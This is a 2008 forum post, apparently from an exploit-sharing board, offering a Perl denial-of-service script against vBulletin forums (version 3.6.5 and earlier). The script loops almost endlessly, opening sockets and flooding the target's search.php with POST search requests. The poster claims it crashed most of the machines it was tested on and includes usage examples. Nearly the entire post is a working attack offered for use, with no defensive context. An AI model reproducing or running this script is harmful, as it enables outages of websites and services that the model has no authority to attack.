Followers 1

VBulletin DoS Exploit [All Versions]

By CODEX, October 23, 2008 in Exploituri

Recommended Posts

CODEX

Posted October 23, 2008

- Report

Posted October 23, 2008

# VBulletin DoS Exploit

# 

# The exploit was tested on 15 machines And 13 of them got Crashed. 98% Works;) 

# 

# important => Make sure that Image Verification in (search.php) is NOT Enabled.

# It works on 3.6.5 and prior [all] !

#

#Perl Script

use Socket;

if (@ARGV < 2) { &usage; }

$rand=rand(10);

$host = $ARGV[0];

$dir = $ARGV[1];

$host =~ s/(http:\/\/)//eg;

for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++)

{

$user="h4x0r".$rand.$i;

$data = "s=&do=process&query=$user&titleonly=0&starteronly =0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descendin g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";

$len = length $data;

$foo = "POST ".$dir."search.php HTTP/1.1\r\n".

               "Accept: */*\r\n".

               "Accept-Language: en-gb\r\n".

               "Content-Type: application/x-www-form-urlencoded\r\n".

               "Accept-Encoding: gzip, deflate\r\n".

               "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".

               "Host: $host\r\n".

               "Content-Length: $len\r\n".

               "Connection: Keep-Alive\r\n".

               "Cache-Control: no-cache\r\n\r\n".

 "$data";

     my $port = "80";

     my $proto = getprotobyname('tcp');





     socket(SOCKET, PF_INET, SOCK_STREAM, $proto);

     connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;

     send(SOCKET,"$foo", 0);

     syswrite STDOUT, "|";

}

print "\n\n";

system('ping $host');

sub usage {

print "\tusage: \n";

print "\t$0  \n";

print "\tex: $0 127.0.0.1 /forum/\n";

print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";

exit();

};